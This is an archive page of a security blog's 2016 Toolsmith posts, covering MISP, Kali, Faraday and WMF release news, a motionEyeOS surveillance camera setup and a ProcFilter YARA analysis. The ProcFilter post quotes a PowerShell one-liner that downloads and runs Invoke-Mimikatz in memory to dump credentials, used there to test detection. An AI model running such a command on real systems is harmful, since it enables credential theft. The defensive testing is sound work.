Saturday, October 08, 2016

Toolsmith Release Advisory: Malware Information Sharing Platform (MISP) 2.4.52

7 OCT 2016 saw the release of MISP 2.4.52.
MISP, Malware Information Sharing Platform and Threat Sharing, is free and open source software to aid in sharing of threat and cyber security indicators.
An overview of MISP as derived from the project home page:
  • Automation:  Store IOCs in a structured manner, and benefit from correlation, automated exports for IDS, or SIEM, in STIX or OpenIOC and even to other MISPs.
  • Simplicity: the driving force behind the project. Storing and using information about threats and malware should not be difficult. MISP allows getting the maximum out of your data without unmanageable complexity.
  • Sharing: the key to fast and effective detection of attacks. Often organizations are targeted by the same Threat Actor, in the same or different Campaign. MISP makes it easier to share with and receive from trusted partners and trust-groups. Sharing also enables collaborative analysis, preventing redundant work.
The MISP 2.4.52 release includes the following new features:
  • Freetext feed import: a flexible scheme to import any feed available on Internet and incorporate them automatically in MISP. The feed imported can create new event or update an existing event. The freetext feed feature permits to preview the import and quickly integrates external sources.
  • Bro NIDS export added in MISP in addition to Snort and Suricata.
  • A default role can be set allowing flexible role policy.
  • Functionality to allow merging of attributes from a different event.
  • Many updates and improvement in the MISP user-interface including filtering of proposals at index level.
Bug fixes and improvements include:
  • XML STIX export has been significantly improved to ensure enhanced compatibility with other platforms.
  • Bruteforce protection has been fixed.
  • OpenIOC export via the API is now possible.
  • Various bugs at the API level were fixed.
This is an outstanding project that will be the topic of my next Toolsmith In-depth Analysis.

Cheers...until next time.

Friday, September 16, 2016

Toolsmith In-depth Analysis: motionEyeOS for Security Makers

It's rather hard to believe, unimaginable even, but here we are. This is the 120th consecutive edition of toolsmith; every month for the last ten years, I've been proud to bring you insights and analysis on free and open source security tools. I hope you've enjoyed the journey as much as I have, I've learned a ton and certainly hope you have too. If you want a journey through the past, October 2006 through August 2015 are available on my web site here, in PDF form, and many year's worth have been published here on the blog as well.
I labored a bit on what to write about for this 10th Anniversary Edition and settled on something I have yet to cover, a physical security topic. To that end I opted for a very slick, maker project, using a Raspberry Pi 2, a USB web cam, and motionEyeOS. Per Calin Crisan, the project developer, motionEyeOS is a Linux distribution that turns a single-board computer into a video surveillance system. The OS is based on BuildRoot and uses motion as a backend and motionEye for the frontend.
  • Buildroot "is a simple, efficient and easy-to-use tool to generate embedded Linux systems through cross-compilation."
  • Motion (wait for it) is a program that monitors the video signal from cameras and is able to detect if a significant part of the picture has changed; in other words, it can detect motion.
  • motionEye is also Calin's project and is web frontend for the motion daemon.

Installation was insanely easy, I followed Calin's installation guidelines and used Win32DiskImager to write the image to the SD card. Here's how straightforward it was in summary.
1) Download the latest motionEyeOS image. I used build 20160828 for Raspberry Pi 2.
2) Write the image to SD card, insert the SD into your Pi.
3) Plug a supported web camera in to your Pi, power up the Pi. Give it a couple minutes after first boot per the guidelines: do not disconnect or reboot your board during these first two minutes. The initialization steps:
  • prepare the data partition on the SD card
  • configure SSH remote access
  • auto-configure any detected camera devices
4) Determine the IP addressed assigned to the Pi, DHCP is default. You can do this with a monitor plugged in the the Pi's HDMI port, via your router's connected devices list, or with a network scan.
For detailed installation instructions, refer to PiMyLifeUp's Build a Raspberry Pi Security Camera Network. It refers to a dated, differently named (motionPie) version of motionEyeOS, but provides great detail if you need it. There are a number of YouTube videos too, just search motionEyeOS.

Configuration is also ridiculously simple. Point your browser to the IP address for the Pi, for me on my wired network, and once I configured motionEyeOS to use my WiFi dongle.
The first time you login, the password is blank so change that first. In the upper left corner of the UI you'll see a round icon with three lines, that's the setting menu. Click it, change your admin and user (viewer) passwords STAT. Then immediately enable Advanced Settings.
Figure 1: Preferences

You'll definitely want to add a camera, and keep in mind, you can manage multiple cameras with on motionEyeOS devices, and even multiple motionEyeOS systems with one master controller. Check out Usage Scenarios for more.
Figure 2: Add a camera

Once your camera is enabled, you'll see its feed in the UI. Note that there are unique URLs for snapshots, streaming and embedding.

Figure 3: Active camera and URLs
When motion detection has enabled the camera, the video frame in the UI will be wrapped in orange-red. You can also hover over the video frame for additional controls such as full screen and immediate access to stored video.

There are an absolute plethora of settings options, the most important of which, after camera configuration, is storage. You can write to local storage or a network share, this quickly matters if you choose and always-on scenario versus motion enabled.
Figure 4: Configure file storage
You can configure text overlay, video streaming, still images, schedules, and more.
Figure 5: Options, options, options
The most important variable of all us how you want to be notified. 
There are configuration options that allow you to run commands so you script up a preferred process or use one already devised.
Figure 6: Run a command for notification

Best of all, you can make uses of a variety of notification services including email, as well as Pushover, and IFTTT via Web Hooks.
Figure 7: Web Hook notifications
There is an outstanding article on using Pushover and IFTTT on Pi Supply's Maker Zone. It makes it easy to leverage such services even if you haven't done so before.
The net result, after easy installation, and a little bit of configuration is your on motion-enabled CCTV system that costs very little compared to its commercial counterparts.
Figure 8: Your author entering his office under the watchful eye of Camera1
Purists will find image quality a bit lacking perhaps, but with the right camera you can use Fast Network Camera. Do be aware of the drawbacks though (lost functionality).

In closing, I love this project. Kudos to Calin Crisan for this project. Makers and absolute beginners alike can easily create a great motion enabled video/still camera setup, or a network of managed cameras with always on video. The hardware is inexpensive and readily available. If you've not explored Raspberry Pi this is a great way to get started. If you're looking for a totally viable security video monitoring implementation, motionEyeOS and your favorite IoT hardware (the project supports other boards too) are a perfect combo. Remember too that there are Raspberry Pi board-specific camera modules available.

Ping me via email or Twitter if you have questions (russ at holisticinfosec dot org or @holisticinfosec).
Cheers…until next time.

Saturday, September 10, 2016

Best toolsmith tool of the last ten years

As we celebrate Ten Years of Toolsmith and 120 individual tools covered in detail with the attention they deserve, I thought it'd be revealing to see who comes to the very top of the list for readers/voters.
I've built a poll from the last eight Toolsmith Tools of the Year to help you decide, and it's a hell of a list.
 Amazing, right? The best of the best.

You can vote in the poll to your right, it'll be open for two weeks.

Sunday, September 04, 2016

Toolsmith Tidbit: Will Ballenthin's Python-evtx

Andrew Case (@attrc) called out Will Ballenthin's (@williballenthin) Python-evtx on Twitter, reminding me that I'm long overdue in mentioning it here as well.
Will's Python-evtx description from his website for same follows:
"python-evtx is a pure Python parser for recent Windows Event Log files (those with the file extension “.evtx”). The module provides programmatic access to the File and Chunk headers, record templates, and event entries. For example, you can use python-evtx to review the event logs of Windows 7 systems from a Mac or Linux workstation. The structure definitions and parsing strategies were heavily inspired by the work of Andreas Schuster and his Perl implementation Parse-Evtx."

Assuming you've running Python 2.7, install it via pip install python-evtx or download source from Github:

Toolsmith Release Advisory: Kali Linux 2016.2 Release

On the heels of Black Hat and DEF CON, 31 AUG 2016 brought us the second Kali Rolling ISO release aka Kali 2016.2. This release provides a number of updates for Kali, including:
  • New KDE, MATE, LXDE, e17, and Xfce builds for folks who want a desktop environment other than Gnome.
  • Kali Linux Weekly ISOs, updated weekly builds of Kali that will be available to download via their mirrors.
  • Bug Fixes and OS Improvements such as HTTPS support in busybox now allowing the preseed of Kali installations securely over SSL. 
All details available here:
Thanks to Rob Vandenbrink for calling out this release. 

Friday, August 19, 2016

Toolsmith Release Advisory: Faraday v2.0 - Collaborative Penetration Test & Vulnerability Management Platform

Toolsmith first covered Faraday in March 2015 with Faraday IPE - When Tinfoil Won’t Work for Pentesting. As it's just hit its 2.0 release milestone, I'm reprinting Francisco Amato's announcement regarding Faraday 2.0 as sent via to the webappsec mailing list.

"Faraday is the Integrated Multiuser Risk Environment you were looking
for! It maps and leverages all the knowledge you generate in real
time, letting you track and understand your audits. Our dashboard for
CISOs and managers uncovers the impact and risk being assessed by the
audit in real-time without the need for a single email. Developed with
a specialized set of functionalities that help users improve their own
work, the main purpose is to re-use the available tools in the
community taking advantage of them in a collaborative way! Check out
the Faraday project in Github.

Two years ago we published our first community version consisting
mainly of what we now know as the Faraday Client and a very basic Web
UI. Over the years we introduced some pretty radical changes, but
nothing like what you are about to see - we believe this is a turning
point for the platform, and we are more than happy to share it with
all of you. Without further ado we would like to introduce you to
Faraday 2.0!

This release, presented at Black Hat Arsenal 2016, spins around our
four main goals for this year:

* Faraday Server - a fundamental pillar for Faraday's future. Some of
the latest features in Faraday required a server that could step
between the client and CouchDB, so we implemented one! It still
supports a small amount of operations but it was built thinking about
performance. Which brings us to objective #2...

* Better performance - Faraday will now scale as you see fit. The new
server allows to have huge workspaces without a performance slowdown.
200k hosts? No problem!

* Deprecate QT3 - the QT3 interface has been completely erased, while
the GTK one presented some versions ago will be the default interface
from now on. This means no more problems with QT3 non-standard
packages, smooth OSX support and a lighter Faraday Client for

* Licenses - managing a lot of products is time consuming. As you may
already know we've launched Faraday's own App Store where you can get all of your
favourite tools (Burp suite, IDA Debugger, etc) whether they're open
source or commercial ones. But also, in order to keep your licenses up
to date and never miss an expiry date we've built a Licenses Manager
inside Faraday. Our platform now stores the licenses of third party
products so you can easily keep track of your licenses while
monitoring your pentest.

With this new release we can proudly say we already met all of this
year's objectives, so now we have more than four months to polish the
details. Some of the features released in this version are quite
basic, and we plan to extend them in the next few iterations.


* Improved executive report generation performance.
* Totally removed QT3, GTK is now the only GUI.
* Added Faraday Server.
* Added some basic APIs to Faraday Server.
* Deprecated FileSystem databases: now Faraday works exclusively with
Faraday Server and CouchDB.
* Improved performance in web UI.
* Added licenses management section in web UI.
* Fixed bug when deleting objects from Faraday Web.
* Fixed bug when editing services in the web UI.
* Fixed bug where icons were not copied to the correct directory on
* Added a button to go to the Faraday Web directly from GTK.
* Fixed bug where current workspace wouldn't correspond to selected
workspace on the sidebar on GTK.
* Fixed bug in 'Refresh Workspace' button on GTK.
* Fixed bug when searching for a non-existent workspace in GTK.
* Fixed bug where Host Sidebar and Status Bar information wasn't
correctly updated on GTK.
* Fixed sqlmap plugin.
* Fixed metasploit plugin.

We hope you enjoy it, and let us know if you have any questions or comments."

Ping me via email or Twitter if you have questions (russ at holisticinfosec dot org or @holisticinfosec).
Cheers…until next time. 

Tuesday, August 09, 2016

Toolsmith In-depth Analysis: ProcFilter - YARA-integrated Windows process denial framework

Note: Next month, toolsmith #120 will represent ten years of award winning security tools coverage. It's been an amazing journey; I look to you, dear reader, for ideas on what tool you'd like to see me cover for the decade anniversary edition. Contact information at the end of this post.

Toolsmith #119 focuses on ProcFilter, a new project, just a month old as this is written, found on Github by one of my blue team members (shout-out to Ina). Brought to you by the GoDaddy Engineering crew, I see a lot of upside and potential in this project. Per it's GitHub readme, ProcFilter is "a process filtering system for Windows with built-in YARA integration. YARA rules can be instrumented with custom meta tags that tailor its response to rule matches. It runs as a Windows service and is integrated with Microsoft's ETW API, making results viewable in the Windows Event Log. Installation, activation, and removal can be done dynamically and do not require a reboot."
Malware analysts can use ProcFilter to create YARA signatures to protect Windows environments against specific threats. It's a lightweight, precise, targeted tool that does not include a large signature set. "ProcFilter is also intended for use in controlled analysis environments where custom plugins can perform artifact-specific actions."
GoDaddy's Emerson Wiley, the ProcFilter project lead provided me with valuable insight on the tool and its future.
"For us at GoDaddy the idea was to get YARA signatures deployed proactively. YARA has a lot of traction within the malware analysis community and its flexible nature makes it perfect for malware categorization. What ProcFilter brings to the table is the ability to get those signatures out there in a preventative fashion with minimal overhead. What we're saying by making this project open source is, “This is interesting to us; if it’s interesting to you then lets work together and move it forward.”

Endpoint tools don’t typically provide openness, flexibility, and extensibility so those are other areas where ProcFilter stands out. I’m passionate about creating extensible software - if people have the opportunity to implement their own ideas it’s pretty much guaranteed that you’ll be blown away by what they create. With the core of the project trending towards stability we’re going to start focusing on building plugins that do unique and interesting things with process manipulation. We’re just starting to scratch the surface there and I look forward to what comes next.

Something I haven’t mentioned elsewhere is a desire to integrate support for Python or Lua plugins. This could provide security engineers a quick, easy way to react to process and thread events. There’s a testing branch with some of these features and we’ll see where it goes."

ProcFilter integrates nicely with Git and Windows Event Logging to minimize the need for additional tools or infrastructure for rules deployment or results acquisition.

ProcFilter is a beta offering with lots of commits from Emerson. I grabbed the x64 release (debug available too) installer for the 1.0.0-beta.2 release. Installation was seamless and rapid. It runs as a service by default, you'll see ProcFilter Service via the services.msc as follows.

ProcFilter Service
You'll want to review, and likely modify, procfilter.ini as it lets you manage ProcFilter with flexible granularity.  You'll be able to manage plugins, rules files, blocking, logging, and quarantine, as well as scanning parameters and white-listing.

ProcFilter Use
You can also work with ProcFilter interactively via the command prompt, again with impressive flexibility. A quick procfilter -status will advise you of your running state.
ProcFilter Service
Given that ProcFilter installs out of the gate with a lean rule set, I opted to grab a few additional rules for detection of my test scenario. There is one rule set built by Florian Roth (Neo23x0) that you may want to deploy situationally as it's quite broad, but offers extensive and effective coverage. As my test scenario was specific to PowerShell-born attacks such as Invoke-Mimikatz, I zoomed in for a very specific rule set devised by the man himself, mimikatz creator Benjamin Delpy. Yes, he's written very effective rules to detect his own craftsmanship. 
mimikatz power_pe_injection Yara rule
I opted to drop the rules in my master.yara file in the localrules directory, specifically here: C:\Program Files\ProcFilter\localrules\master.yara. I restarted the service and also ran procfilter -compile from the command line to ensure a clean rules build. Command-line options follow:
Command-line options

As noted in our May 2015 discussion of Rekall use for hunting in-memory adversaries, an attack such as IEX (New-Object Net.WebClient).DownloadString(''); Invoke-Mimikatz -DumpCreds should present a good opportunity for testing. Given the endless amount of red vs. blue PowerShell scenarios, this one lined up perfectly. Using a .NET webclient call, this expression grabs Invoke-Mimikatz.ps1 from @mattifestation's PowerSploit Github and runs it in memory.

The attack didn't get very far at all on Windows 10, by design, but that doesn't mean we don't want to detect such attempted abuses in our environment, even if unsuccessful.

You can use command-line options to sweep broadly or target a specific process. In this case, I was able to reasonably assert (good job, Russ) that the PowerShell process might be the culprit. Sheer genius, I know. :-)

Suspect process

Running procfilter -memoryscan 10612 came through like a champ.
Command-line ProcFilter detection
The real upside of ProcFilter though is that it writes to the Windows Event Log, you just need to build a custom filter as described in the readme.
The result, as dictated in part by your procfilter.ini configuration should like something like the following, once you trigger an event that matches one of your Yara rules.
ProcFilter event log view
In closing

Great stuff from the GoDaddy Engineering team, I see significant promise in ProcFilter and really look forward to its continued support and development. Thanks to Emerson Wiley for all his great feedback.
Ping me via email or Twitter if you have questions: russ at holisticinfosec dot org or @holisticinfosec.
Cheers…until next time, for the big decade anniversary edition.

Wednesday, July 27, 2016

Toolsmith Release Advisory: Windows Management Framework (WMF) 5.1 Preview

Windows Management Framework (WMF) 5.1 Preview has been released to the Download Center.
"WMF provides users with the ability to update previous releases of Windows Server and Windows Client to the management platform elements released in the most current version of Windows. This enables a consistent management platform to be used across the organization, and eases adoption of the latest Windows release."
As posted to the Window PowerShell Blog and reprinted here:
WMF 5.1 Preview includes the PowerShell, WMI, WinRM, and Software Inventory and Licensing (SIL) components that are being released with Windows Server 2016. 
WMF 5.1 can be installed on Windows 7, Windows 8.1, Windows Server 2008 R2, 2012, and 2012 R2, and provides a number of improvements over WMF 5.0 RTM including:
  • New cmdlets: local users and groups; Get-ComputerInfo
  • PowerShellGet improvements include enforcing signed modules, and installing JEA modules
  • PackageManagement added support for Containers, CBS Setup, EXE-based setup, CAB packages
  • Debugging improvements for DSC and PowerShell classes
  • Security enhancements including enforcement of catalog-signed modules coming from the Pull Server and when using PowerShellGet cmdlets
  • Responses to a number of user requests and issues
Detailed information on all the new WMF 5.1 features and updates, along with installation instructions, are in the WMF 5.1 release notes.
Please note:
  • WMF 5.1 Preview requires the .Net Framework 4.6, which must be installed separately. Instructions are available in the WMF 5.1 Release Notes Install and Configure topic.
  • WMF 5.1 Preview is intended to provide early information about what is in the release, and to give you the opportunity to provide feedback to the PowerShell team, but is not supported for production deployments at this time.
  • WMF 5.1 Preview may be installed directly over WMF 5.0.
  • It is a known issue that WMF 4.0 is currently required in order to install WMF 5.1 Preview on Windows 7 and Windows Server 2008. This requirement is expected to be removed before the final release.
  • Installing future versions of WMF 5.1, including the RTM version, will require uninstalling the WMF 5.1 Preview.